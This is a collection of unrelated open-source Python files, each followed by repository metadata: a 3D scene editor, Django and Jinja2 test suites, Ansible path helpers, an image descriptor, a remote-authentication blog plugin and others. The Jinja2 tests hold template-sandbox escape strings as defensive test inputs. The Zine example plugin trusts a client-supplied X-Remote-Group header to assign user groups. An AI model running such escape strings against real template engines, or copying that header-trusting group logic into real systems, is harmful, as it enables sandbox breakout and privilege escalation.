self.ParticleVar.set(self.ParticleEnable)
self.baseUseDriveVar.set(self.basedriveEnable)
self.backgroundColor.set(value = self.worldColor)
pass
def toggleLights(self):
#################################################################
# toggleLights(self)
# send out a message to let sceneEditor know we need to toggle the light.
# Then, sceneEditor will pass the message to dataHolder to disable/enable
# the lights. (lightManager is inside the dataHolder)
#################################################################
self.lightEnable = (self.lightEnable+1)%2
messenger.send('SW_lightToggle')
pass
def showCollision(self):
#################################################################
# showCollision(self)
# This function will send out a message to sceneEditor to toggle
# the visibility of collision objects.
#################################################################
self.collision = (self.collision+1)%2
messenger.send('SW_collisionToggle', [self.collision])
pass
def enableParticle(self):
#################################################################
# enableParticle(self)
# This function will send out a message to sceneEditor to toggle
# the visibility of particle objects.
#################################################################
self.ParticleEnable = (self.ParticleEnable+1)%2
messenger.send('SW_particleToggle', [self.ParticleEnable])
pass
def enablebaseUseDrive(self):
#################################################################
# enablebaseUseDrive(self)
# This function will toggle the usage of base.useDrive.
# Well, it may not usefull at all.
#
# We won't send out any message in this time to notice
# the sceneEditor this event happend.
# In the other hand, we will restore it back when
# the side window has been closed.
#
#################################################################
if self.enableBaseUseDrive==0:
print('Enabled')
base.useDrive()
self.enableBaseUseDrive = 1
else:
print('disabled')
#base.useTrackball()
base.disableMouse()
self.enableBaseUseDrive = 0
self.basedriveEnable = (self.basedriveEnable+1)%2
pass
def toggleBackface(self):
#################################################################
# toggleBackface(self)
# This function will toggle the back face setting. so it will
# render the polygon with two sides.
#################################################################
base.toggleBackface()
self.backface = (self.backface+1)%2
return
def toggleBackfaceFromMainW(self):
#################################################################
# toggleBackfaceFromMainW(self)
# This function is called by sceneEditor when user used hot key
# to toggle the back face setting in the main panda window.
# In here we will only reset the flag and reset the state of
# check box
#################################################################
self.backface = (self.backface+1)%2
self.backfaceButton.toggle()
return
def toggleTexture(self):
#################################################################
# toggleTexture(self)
# This function will toggle the txture using option for the whole scene.
#################################################################
base.toggleTexture()
self.texture = (self.texture+1)%2
return
def toggleTextureFromMainW(self):
#################################################################
# toggleTextureFromMainW(self)
# This function is called by sceneEditor when user used hot key
# to toggle the texture usage from the main panda window.
# In here we will only reset the flag and reset the state of
# check box
#################################################################
self.texture = (self.texture+1)%2
self.textureButton.toggle()
return
def toggleWireframe(self):
#################################################################
# toggleWireframe(self)
# This function will toggle the wire frame mode.
#################################################################
base.toggleWireframe()
self.wireframe = (self.wireframe+1)%2
return
def toggleWireframeFromMainW(self):
#################################################################
# toggleWireframeFromMainW(self)
# This function is called by sceneEditor when user used hot key
# to toggle the wire frame mode in the main panda window.
# In here we will only reset the flag and reset the state of
# check box
#################################################################
self.wireframe = (self.wireframe+1)%2
self.wireframeButton.toggle()
return
def toggleGrid(self):
#################################################################
# toggleGrid(self)
# This function will toggle the usage of the grid.
#################################################################
self.grid = (self.grid+1)%2
if self.grid==1:
SEditor.grid.enable()
else:
SEditor.grid.disable()
def togglewidgetVis(self):
#################################################################
# togglewidgetVis(self)
# This function will toggle the visibility of the widget of the grid.
#################################################################
self.widgetVis = (self.widgetVis+1)%2
SEditor.toggleWidgetVis()
if SEditor.widget.fActive:
messenger.send('shift-f')
return
def toggleWidgetVisFromMainW(self):
#################################################################
# toggleWidgetVisFromMainW(self)
# This function is called by sceneEditor when user used hot key
# to toggle the visibility of widgets ('v') from the main panda window.
# In here we will only reset the flag and reset the state of
# check box
#################################################################
self.widgetVis = (self.widgetVis+1)%2
self.widgetVisButton.toggle()
return
def setBackgroundColorVec(self,color):
#################################################################
# setBackgroundColorVec(self,color)
# Call back function
# This will be called from the colorEntry on the world setting page.
# The "color" here is a list containing three integer data, R, G and B.
#################################################################
base.setBackgroundColor(color[0]/255.0,
color[1]/255.0,
color[2]/255.0)
self.worldColor = [color[0],color[1],color[2],0]
def toggleAutoCamera(self):
#################################################################
# toggleAutoCamera(self)
# This function will toggle the usage of the auto-camera movement
# when user loaded model or actor into the scene.
#################################################################
self.enableAutoCamera = (self.enableAutoCamera+1)%2
SEditor.toggleAutoCamera()
return
def selectPage(self,page='Tree Graph'):
#################################################################
#################################################################
self.notebookFrame.selectpage(page)
| {
"content_hash": "eab98eeae04984742163f8870380a484",
"timestamp": "",
"source": "github",
"line_count": 462,
"max_line_length": 122,
"avg_line_length": 41.142857142857146,
"alnum_prop": 0.5167824074074074,
"repo_name": "chandler14362/panda3d",
"id": "96c225c58fafea67c25527280b053ba87174f28a",
"size": "19212",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "contrib/src/sceneeditor/SideWindow.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4004"
},
{
"name": "C",
"bytes": "5288285"
},
{
"name": "C++",
"bytes": "27114399"
},
{
"name": "Emacs Lisp",
"bytes": "229264"
},
{
"name": "HTML",
"bytes": "8081"
},
{
"name": "Java",
"bytes": "3113"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Logos",
"bytes": "5504"
},
{
"name": "MAXScript",
"bytes": "1745"
},
{
"name": "NSIS",
"bytes": "61448"
},
{
"name": "Nemerle",
"bytes": "3001"
},
{
"name": "Objective-C",
"bytes": "27625"
},
{
"name": "Objective-C++",
"bytes": "258129"
},
{
"name": "Perl",
"bytes": "206982"
},
{
"name": "Perl 6",
"bytes": "27055"
},
{
"name": "Puppet",
"bytes": "2627"
},
{
"name": "Python",
"bytes": "5568942"
},
{
"name": "R",
"bytes": "421"
},
{
"name": "Roff",
"bytes": "3432"
},
{
"name": "Shell",
"bytes": "55940"
},
{
"name": "Visual Basic",
"bytes": "136"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from mock import Mock, NonCallableMock, NonCallableMagicMock, patch
from silk.collector import DataCollector
from silk.models import SQLQuery, Request
from silk.sql import execute_sql
from .util import delete_all_models
def mock_sql():
mock_sql_query = Mock(spec_set=['_execute_sql', 'query', 'as_sql'])
mock_sql_query._execute_sql = Mock()
mock_sql_query.query = NonCallableMock(spec_set=['model'])
mock_sql_query.query.model = Mock()
query_string = 'SELECT * from table_name'
mock_sql_query.as_sql = Mock(return_value=(query_string, ()))
return mock_sql_query, query_string
class TestCall(TestCase):
@classmethod
def setUpClass(cls):
DataCollector().configure(request=None)
delete_all_models(SQLQuery)
cls.mock_sql, cls.query_string = mock_sql()
kwargs = {
'one': 1,
'two': 2
}
cls.args = [1, 2]
cls.kwargs = kwargs
execute_sql(cls.mock_sql, *cls.args, **cls.kwargs)
def test_called(self):
self.mock_sql._execute_sql.assert_called_once_with(*self.args, **self.kwargs)
def test_count(self):
self.assertEqual(1, len(DataCollector().queries))
def _get_query(self):
query = list(DataCollector().queries.values())[0]
return query
def test_no_request(self):
query = self._get_query()
self.assertNotIn('request', query)
def test_query(self):
query = self._get_query()
self.assertEqual(query['query'], self.query_string)
class TestCallSilky(TestCase):
def test_no_effect(self):
DataCollector().configure()
sql, _ = mock_sql()
sql.query.model = NonCallableMagicMock(spec_set=['__module__'])
sql.query.model.__module__ = 'silk.models'
# No SQLQuery models should be created for silk requests for obvious reasons
with patch('silk.sql.DataCollector', return_value=Mock()) as mock_DataCollector:
execute_sql(sql)
self.assertFalse(mock_DataCollector().register_query.call_count)
class TestCollectorInteraction(TestCase):
def _query(self):
try:
query = list(DataCollector().queries.values())[0]
except IndexError:
self.fail('No queries created')
return query
def test_request(self):
DataCollector().configure(request=Request.objects.create(path='/path/to/somewhere'))
sql, _ = mock_sql()
execute_sql(sql)
query = self._query()
self.assertEqual(query['request'], DataCollector().request)
def test_registration(self):
DataCollector().configure(request=Request.objects.create(path='/path/to/somewhere'))
sql, _ = mock_sql()
execute_sql(sql)
query = self._query()
self.assertIn(query, DataCollector().queries.values())
| {
"content_hash": "a77d2fb65dab46b538092fa81e0ede30",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 92,
"avg_line_length": 33.44186046511628,
"alnum_prop": 0.6356050069541029,
"repo_name": "CloudNcodeInc/silk",
"id": "23c460196aa62cfecd72c74347d2479d18090422",
"size": "2876",
"binary": false,
"copies": "1",
"ref": "refs/heads/dj18",
"path": "tests/tests/test_execute_sql.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12916"
},
{
"name": "HTML",
"bytes": "59924"
},
{
"name": "JavaScript",
"bytes": "61203"
},
{
"name": "Python",
"bytes": "180204"
}
],
"symlink_target": ""
} |
"""
jinja2.testsuite.security
~~~~~~~~~~~~~~~~~~~~~~~~~
Checks the sandbox and other security features.
:copyright: (c) 2017 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import pytest
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, \
ImmutableSandboxedEnvironment, unsafe
from jinja2 import Markup, escape
from jinja2.exceptions import SecurityError, TemplateSyntaxError, \
TemplateRuntimeError
from jinja2.nodes import EvalContext
from jinja2._compat import text_type
class PrivateStuff(object):
def bar(self):
return 23
@unsafe
def foo(self):
return 42
def __repr__(self):
return 'PrivateStuff'
class PublicStuff(object):
bar = lambda self: 23
_foo = lambda self: 42
def __repr__(self):
return 'PublicStuff'
@pytest.mark.sandbox
class TestSandbox(object):
def test_unsafe(self, env):
env = SandboxedEnvironment()
pytest.raises(SecurityError, env.from_string("{{ foo.foo() }}").render,
foo=PrivateStuff())
assert env.from_string("{{ foo.bar() }}").render(foo=PrivateStuff()) == '23'
pytest.raises(SecurityError,
env.from_string("{{ foo._foo() }}").render,
foo=PublicStuff())
assert env.from_string("{{ foo.bar() }}").render(foo=PublicStuff()) == '23'
assert env.from_string("{{ foo.__class__ }}").render(foo=42) == ''
assert env.from_string("{{ foo.func_code }}").render(foo=lambda:None) == ''
# security error comes from __class__ already.
pytest.raises(SecurityError, env.from_string(
"{{ foo.__class__.__subclasses__() }}").render, foo=42)
def test_immutable_environment(self, env):
env = ImmutableSandboxedEnvironment()
pytest.raises(SecurityError, env.from_string(
'{{ [].append(23) }}').render)
pytest.raises(SecurityError, env.from_string(
'{{ {1:2}.clear() }}').render)
def test_restricted(self, env):
env = SandboxedEnvironment()
pytest.raises(TemplateSyntaxError, env.from_string,
"{% for item.attribute in seq %}...{% endfor %}")
pytest.raises(TemplateSyntaxError, env.from_string,
"{% for foo, bar.baz in seq %}...{% endfor %}")
def test_markup_operations(self, env):
# adding two strings should escape the unsafe one
unsafe = '<script type="application/x-some-script">alert("foo");</script>'
safe = Markup('<em>username</em>')
assert unsafe + safe == text_type(escape(unsafe)) + text_type(safe)
# string interpolations are safe to use too
assert Markup('<em>%s</em>') % '<bad user>' == \
'<em><bad user></em>'
assert Markup('<em>%(username)s</em>') % {
'username': '<bad user>'
} == '<em><bad user></em>'
# an escaped object is markup too
assert type(Markup('foo') + 'bar') is Markup
# and it implements __html__ by returning itself
x = Markup("foo")
assert x.__html__() is x
# it also knows how to treat __html__ objects
class Foo(object):
def __html__(self):
return '<em>awesome</em>'
def __unicode__(self):
return 'awesome'
assert Markup(Foo()) == '<em>awesome</em>'
assert Markup('<strong>%s</strong>') % Foo() == \
'<strong><em>awesome</em></strong>'
# escaping and unescaping
assert escape('"<>&\'') == '"<>&''
assert Markup("<em>Foo & Bar</em>").striptags() == "Foo & Bar"
assert Markup("<test>").unescape() == "<test>"
def test_template_data(self, env):
env = Environment(autoescape=True)
t = env.from_string('{% macro say_hello(name) %}'
'<p>Hello {{ name }}!</p>{% endmacro %}'
'{{ say_hello("<blink>foo</blink>") }}')
escaped_out = '<p>Hello <blink>foo</blink>!</p>'
assert t.render() == escaped_out
assert text_type(t.module) == escaped_out
assert escape(t.module) == escaped_out
assert t.module.say_hello('<blink>foo</blink>') == escaped_out
assert escape(t.module.say_hello(
EvalContext(env), '<blink>foo</blink>')) == escaped_out
assert escape(t.module.say_hello(
'<blink>foo</blink>')) == escaped_out
def test_attr_filter(self, env):
env = SandboxedEnvironment()
tmpl = env.from_string('{{ cls|attr("__subclasses__")() }}')
pytest.raises(SecurityError, tmpl.render, cls=int)
def test_binary_operator_intercepting(self, env):
def disable_op(left, right):
raise TemplateRuntimeError('that operator so does not work')
for expr, ctx, rv in ('1 + 2', {}, '3'), ('a + 2', {'a': 2}, '4'):
env = SandboxedEnvironment()
env.binop_table['+'] = disable_op
t = env.from_string('{{ %s }}' % expr)
assert t.render(ctx) == rv
env.intercepted_binops = frozenset(['+'])
t = env.from_string('{{ %s }}' % expr)
try:
t.render(ctx)
except TemplateRuntimeError as e:
pass
else:
assert False, 'expected runtime error'
def test_unary_operator_intercepting(self, env):
def disable_op(arg):
raise TemplateRuntimeError('that operator so does not work')
for expr, ctx, rv in ('-1', {}, '-1'), ('-a', {'a': 2}, '-2'):
env = SandboxedEnvironment()
env.unop_table['-'] = disable_op
t = env.from_string('{{ %s }}' % expr)
assert t.render(ctx) == rv
env.intercepted_unops = frozenset(['-'])
t = env.from_string('{{ %s }}' % expr)
try:
t.render(ctx)
except TemplateRuntimeError as e:
pass
else:
assert False, 'expected runtime error'
@pytest.mark.sandbox
class TestStringFormat(object):
def test_basic_format_safety(self):
env = SandboxedEnvironment()
t = env.from_string('{{ "a{0.__class__}b".format(42) }}')
assert t.render() == 'ab'
def test_basic_format_all_okay(self):
env = SandboxedEnvironment()
t = env.from_string('{{ "a{0.foo}b".format({"foo": 42}) }}')
assert t.render() == 'a42b'
def test_safe_format_safety(self):
env = SandboxedEnvironment()
t = env.from_string('{{ ("a{0.__class__}b{1}"|safe).format(42, "<foo>") }}')
assert t.render() == 'ab<foo>'
def test_safe_format_all_okay(self):
env = SandboxedEnvironment()
t = env.from_string('{{ ("a{0.foo}b{1}"|safe).format({"foo": 42}, "<foo>") }}')
assert t.render() == 'a42b<foo>'
| {
"content_hash": "2938e7cce5da741224fec1cc505b5959",
"timestamp": "",
"source": "github",
"line_count": 188,
"max_line_length": 87,
"avg_line_length": 37.212765957446805,
"alnum_prop": 0.547455688965123,
"repo_name": "ThiefMaster/jinja2",
"id": "8e4222e521f742e6f9ce1cd5e4d862a62b10d54d",
"size": "7020",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_security.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Emacs Lisp",
"bytes": "4733"
},
{
"name": "HTML",
"bytes": "1729"
},
{
"name": "Makefile",
"bytes": "601"
},
{
"name": "Python",
"bytes": "1242743"
},
{
"name": "Vim script",
"bytes": "5650"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from errno import EEXIST
from ansible.errors import AnsibleError
from ansible.module_utils._text import to_bytes, to_native, to_text
__all__ = ['unfrackpath', 'makedirs_safe']
def unfrackpath(path, follow=True, basedir=None):
'''
Returns a path that is free of symlinks (if follow=True), environment variables, relative path traversals and symbols (~)
:arg path: A byte or text string representing a path to be canonicalized
:arg follow: A boolean to indicate of symlinks should be resolved or not
:raises UnicodeDecodeError: If the canonicalized version of the path
contains non-utf8 byte sequences.
:rtype: A text string (unicode on pyyhon2, str on python3).
:returns: An absolute path with symlinks, environment variables, and tilde
expanded. Note that this does not check whether a path exists.
example::
'$HOME/../../var/mail' becomes '/var/spool/mail'
'''
if basedir is None:
basedir = os.getcwd()
elif os.path.isfile(to_bytes(basedir, errors='surrogate_or_strict')):
basedir = os.path.dirname(basedir)
final_path = os.path.expanduser(os.path.expandvars(to_bytes(path, errors='surrogate_or_strict')))
if not os.path.isabs(final_path):
final_path = os.path.join(to_bytes(basedir, errors='surrogate_or_strict'), final_path)
if follow:
final_path = os.path.realpath(final_path)
return to_text(os.path.normpath(final_path), errors='surrogate_or_strict')
def makedirs_safe(path, mode=None):
'''Safe way to create dirs in muliprocess/thread environments.
:arg path: A byte or text string representing a directory to be created
:kwarg mode: If given, the mode to set the directory to
:raises AnsibleError: If the directory cannot be created and does not already exists.
:raises UnicodeDecodeError: if the path is not decodable in the utf-8 encoding.
'''
rpath = unfrackpath(path)
b_rpath = to_bytes(rpath)
if not os.path.exists(b_rpath):
try:
if mode:
os.makedirs(b_rpath, mode)
else:
os.makedirs(b_rpath)
except OSError as e:
if e.errno != EEXIST:
raise AnsibleError("Unable to create local directories(%s): %s" % (to_native(rpath), to_native(e)))
def basedir(source):
""" returns directory for inventory or playbook """
source = to_bytes(source, errors='surrogate_or_strict')
dname = None
if os.path.isdir(source):
dname = source
elif source in [None, '', '.']:
dname = os.getcwd()
elif os.path.isfile(source):
dname = os.path.dirname(source)
if dname:
# don't follow symlinks for basedir, enables source re-use
dname = os.path.abspath(dname)
return to_text(dname, errors='surrogate_or_strict')
| {
"content_hash": "dee642d76a792888f40277a50d9d6d09",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 125,
"avg_line_length": 35.42168674698795,
"alnum_prop": 0.6653061224489796,
"repo_name": "SergeyCherepanov/ansible",
"id": "41ed017ef43e87c44a4c9567c7075ada22bad1fa",
"size": "3653",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "ansible/ansible/utils/path.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Shell",
"bytes": "824"
}
],
"symlink_target": ""
} |
import timeit
import numpy as np
from PIL import Image
class CoMatrix():
''' Co-occurrence matrix class '''
def __init__(self, dx, dy):
''' Initialize the class. Set non-negative distance between neighbours '''
if dx < 0 or dy < 0: raise Exception(u'Neighbour distance have to be non-negative')
self.dx, self.dy = dx, dy # set neighbour distance for co-occurrence matrix
def descriptor(self, path):
''' Return descriptor of the image from the path or None if it is not an image.
Descriptor consists from 3 arrays: rows, columns and non-zero values of
co-occurrence matrix '''
try:
img = Image.open(path) # open image with PIL
except:
print(u'This is not an image: {}'.format(path))
return # return None
array = np.array(img) # convert PIL image to Numpy array, np.uint8
r = array[:,:,0] >> 6 # Red. Leave 2 bit or 4 bins
g = array[:,:,1] >> 5 # Green. Leave 3 bit or 8 bins
b = array[:,:,2] >> 5 # Blue. Leave 3 bit or 8 bins
rgb = (r << 6) + (g << 3) + b # rgb color consists of 9 bit or 512 tints
h, w = rgb.shape # get height and width of the array
h -= self.dy
w -= self.dx
mask = rgb[:h, :w] < rgb[self.dy:, self.dx:]
rows = np.where(mask, rgb[:h, :w], rgb[self.dy:, self.dx:])
cols = np.where(np.invert(mask), rgb[:h, :w], rgb[self.dy:, self.dx:])
comatrix = np.zeros((256, 256), dtype=np.uint32) # create 256x256 matrix
np.add.at(comatrix, [rows, cols], 1)
rows, cols = np.nonzero(comatrix) # get non-zero rows and columns
return rows, cols, comatrix[rows, cols]
def distance(self, descriptor1, descriptor2):
''' Calculate distance between two descriptors and return it as an integer '''
# Restore co-occurrence matrix from descriptor.
# Cannot use np.uint32, because of subtraction of two matrices.
comatrix1 = np.zeros((512, 512), dtype=np.int32)
comatrix1[descriptor1[0], descriptor1[1]] = descriptor1[2]
comatrix2 = np.zeros((512, 512), dtype=np.int32)
comatrix2[descriptor2[0], descriptor2[1]] = descriptor2[2]
return np.absolute(comatrix1 - comatrix2).sum() # sum of abs linear differences
if __name__ == u'__main__':
m = CoMatrix(1, 1) # take bottom right neighbour
d1 = m.descriptor(u'../data/doge.jpg')
d2 = m.descriptor(u'../data/doge2.jpg')
d3 = m.descriptor(u'../data/doge3.jpg')
d4 = m.descriptor(u'../data/city.jpg')
print(u'very small', m.distance(d1, d2)) # doge-doge2
print(u'small', m.distance(d1, d3)) # doge-doge3
print(u'large', m.distance(d1, d4)) # doge-city
n = 100 # number of tests
print(timeit.timeit(stmt=u'm.descriptor(u"../data/doge.jpg")', number=n,
setup=u'from __main__ import m') / n)
print(timeit.timeit(stmt=u'm.distance(d1, d4)', number=n,
setup=u'from __main__ import m, d1, d4') / n)
| {
"content_hash": "756d2ea918652728fc825cc34501d513",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 91,
"avg_line_length": 51.5,
"alnum_prop": 0.5867313915857605,
"repo_name": "foobar167/junkyard",
"id": "34dabd8611c6797ba8e5f921e1f8170513d4c481",
"size": "3114",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "co-occurrence_matrix/co-matrix_256bit.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "133"
},
{
"name": "C",
"bytes": "6015"
},
{
"name": "Dart",
"bytes": "8334"
},
{
"name": "Java",
"bytes": "1097"
},
{
"name": "Jupyter Notebook",
"bytes": "10140837"
},
{
"name": "Objective-C",
"bytes": "1412"
},
{
"name": "Python",
"bytes": "495113"
},
{
"name": "Ruby",
"bytes": "2378"
},
{
"name": "Shell",
"bytes": "1468"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('cxbx_compat', '0011_executable_signature_status'),
]
operations = [
migrations.AddField(
model_name='executable',
name='signature_hash',
field=models.CharField(default=uuid.uuid4, max_length=40, unique=False, null=True),
preserve_default=False,
),
migrations.AlterField(
model_name='executable',
name='signature',
field=models.CharField(max_length=512),
),
]
| {
"content_hash": "8a63868bf7379bf3d445b2e95fdf9bf1",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 95,
"avg_line_length": 26.2,
"alnum_prop": 0.6,
"repo_name": "donwayo/xbox-db",
"id": "941dbb0e2d84b97a917189fc660dc57063b2a4a9",
"size": "728",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cxbx_compat/migrations/0012_auto_20170419_1349.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "10074"
},
{
"name": "Python",
"bytes": "69025"
}
],
"symlink_target": ""
} |
from django.db.models.fields.files import FileField, FieldFile
from django.http import HttpResponse
from django.core.files.storage import get_storage_class
class ProtectedFileField(FileField):
# attr_class = ProtectedFieldFile
"""
A FileField that gives the 'private' ACL to the files it uploads to S3, instead of the default ACL.
"""
def __init__(self, verbose_name=None, name=None, upload_to='', storage=None, **kwargs):
if storage is None:
storage = get_storage_class()(acl='private')
super(ProtectedFileField, self).__init__(verbose_name=verbose_name,
name=name, upload_to=upload_to, storage=storage, **kwargs) | {
"content_hash": "d33c7c1552f3108a08d2d967b83b7377",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 103,
"avg_line_length": 40.11764705882353,
"alnum_prop": 0.6906158357771262,
"repo_name": "flavoi/diventi",
"id": "31e8a15fa5892aadbcf7851bdd7b6aaee1d52932",
"size": "683",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "diventi/products/fields.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "385265"
},
{
"name": "Procfile",
"bytes": "46"
},
{
"name": "Python",
"bytes": "826530"
}
],
"symlink_target": ""
} |
"""
zine.plugins.example_remote_auth
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sample remote authentication instead of Zine's built-in authentication.
"""
from zine.application import Request as RequestBase
from zine.database import db
from zine.utils import forms
from zine.models import User, Group
class Request(RequestBase):
def get_user(self):
# This overrides Zine's default session-based authentication
# with a custom method that looks for environ["REMOTE_USER"]
# and creates the appropriate user in the database if it doesn't
# exist yet. If there is no user logged in, this method should
# return None. The caller will handle the AnonymousUser creation
# in that case.
app = self.app
username = self.environ.get("REMOTE_USER", None)
if not username:
return None
user = User.query.filter_by(username=username).first()
if user is None:
user = User(username, None, "%[email protected]" % username)
db.session.add(user)
db.commit()
return user
def __init__(self, environ, app=None):
RequestBase.__init__(self, environ)
request_groups = set()
current_user = self.user
# We can add Group associations to the current user
# by assigning its `transient_groups` property to
# a list of Group objects. Here we'll add one Group
# if the user is authenticated, and a different one
# if the user is anonymous; and we'll also give the
# HTTP request a chance to add an additional group.
# Note that the groups must exist in the database;
# we create them here if they don't exist.
if current_user.is_somebody:
request_groups.add("Authenticated")
else:
request_groups.add("Anonymous")
group = environ.get("HTTP_X_REMOTE_GROUP", None)
if group:
request_groups.add(group)
_request_groups = []
for group_name in request_groups:
group = Group.query.filter_by(name=group_name).first()
if group is None:
group = Group(group_name)
db.session.add(group)
_request_groups.append(group)
db.commit()
self.user.transient_groups = _request_groups
def setup(app, plugin):
# The `_request_class` attribute of the app is used to
# create the Request objects; so we need to reassign it
# to our Request subclass in order for our custom
# authentication and authorization logic to be active.
# Note that we just assume that no other plugin is also
# trying to override the default Request!
app._request_class = Request
| {
"content_hash": "0747b4f6c74e914bd0d9a61c7e2f99be",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 75,
"avg_line_length": 39.34285714285714,
"alnum_prop": 0.6238198983297023,
"repo_name": "mitsuhiko/zine",
"id": "5c44fe6851e60b800c88155a6af8c98d6649b3ff",
"size": "2778",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "zine/plugins/example_remote_auth/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "215269"
},
{
"name": "Python",
"bytes": "1141277"
},
{
"name": "Shell",
"bytes": "231"
}
],
"symlink_target": ""
} |
"""
The MIT License (MIT)
Copyright (c) 2018 tilda
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
# File for custom exceptions
# noinspection PyPackageRequirements
from discord.ext import commands
class PostException(Exception):
"""
Raised when there's a error in the post()
wrapper
"""
pass
class DBLException(PostException):
"""
Subclass of PostException,
raised when there's a error while posting to
discordbots.org
"""
pass
class DBotsException(PostException):
"""
Subclass of PostException,
raised when there's a error while posting to
bots.discord.pw
"""
pass
class DogException(PostException):
"""
Subclass of PostException,
raised when there's a error while posting to
Datadog
"""
pass
class ServiceError(commands.CommandInvokeError):
"""
Subclass of commands.CommandInvokeError.
Raised whenever a request to a service
returns a failure of some sort.
"""
pass
class NSFWException(commands.CheckFailure):
"""
Subclass of commands.CheckFailure.
Raised whenever a NSFW command is not
executed in a NSFW channel.
"""
pass
| {
"content_hash": "f8639adc2cb7952cf423be25cc12a567",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 75,
"avg_line_length": 27.341772151898734,
"alnum_prop": 0.7379629629629629,
"repo_name": "tilda/lolbot",
"id": "2b0fa4c2d7ee8875b003a801122623805ac267bb",
"size": "2160",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/errors.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "12662"
},
{
"name": "Python",
"bytes": "78292"
},
{
"name": "Shell",
"bytes": "3691"
}
],
"symlink_target": ""
} |
from collections import namedtuple
import random
import json
from rdbtools.parser import RdbCallback
from rdbtools.callbacks import encode_key
ZSKIPLIST_MAXLEVEL=32
ZSKIPLIST_P=0.25
REDIS_SHARED_INTEGERS = 10000
MemoryRecord = namedtuple('MemoryRecord', ['database', 'type', 'key', 'bytes', 'encoding','size', 'len_largest_element'])
class StatsAggregator(object):
def __init__(self, key_groupings = None):
self.aggregates = {}
self.scatters = {}
self.histograms = {}
def next_record(self, record):
self.add_aggregate('database_memory', record.database, record.bytes)
self.add_aggregate('type_memory', record.type, record.bytes)
self.add_aggregate('encoding_memory', record.encoding, record.bytes)
self.add_aggregate('type_count', record.type, 1)
self.add_aggregate('encoding_count', record.encoding, 1)
self.add_histogram(record.type + "_length", record.size)
self.add_histogram(record.type + "_memory", (record.bytes/10) * 10)
if record.type == 'list':
self.add_scatter('list_memory_by_length', record.bytes, record.size)
elif record.type == 'hash':
self.add_scatter('hash_memory_by_length', record.bytes, record.size)
elif record.type == 'set':
self.add_scatter('set_memory_by_length', record.bytes, record.size)
elif record.type == 'sortedset':
self.add_scatter('sortedset_memory_by_length', record.bytes, record.size)
elif record.type == 'string':
self.add_scatter('string_memory_by_length', record.bytes, record.size)
else:
raise Exception('Invalid data type %s' % record.type)
def add_aggregate(self, heading, subheading, metric):
if not heading in self.aggregates :
self.aggregates[heading] = {}
if not subheading in self.aggregates[heading]:
self.aggregates[heading][subheading] = 0
self.aggregates[heading][subheading] += metric
def add_histogram(self, heading, metric):
if not heading in self.histograms:
self.histograms[heading] = {}
if not metric in self.histograms[heading]:
self.histograms[heading][metric] = 1
else :
self.histograms[heading][metric] += 1
def add_scatter(self, heading, x, y):
if not heading in self.scatters:
self.scatters[heading] = []
self.scatters[heading].append([x, y])
def get_json(self):
return json.dumps({"aggregates":self.aggregates, "scatters":self.scatters, "histograms":self.histograms})
class PrintAllKeys(object):
def __init__(self, out):
self._out = out
self._out.write("%s,%s,%s,%s,%s,%s,%s\n" % ("database", "type", "key",
"size_in_bytes", "encoding", "num_elements", "len_largest_element"))
def next_record(self, record) :
self._out.write("%d,%s,%s,%d,%s,%d,%d\n" % (record.database, record.type, encode_key(record.key),
record.bytes, record.encoding, record.size, record.len_largest_element))
class MemoryCallback(RdbCallback):
'''Calculates the memory used if this rdb file were loaded into RAM
The memory usage is approximate, and based on heuristics.
'''
def __init__(self, stream, architecture):
self._stream = stream
self._dbnum = 0
self._current_size = 0
self._current_encoding = None
self._current_length = 0
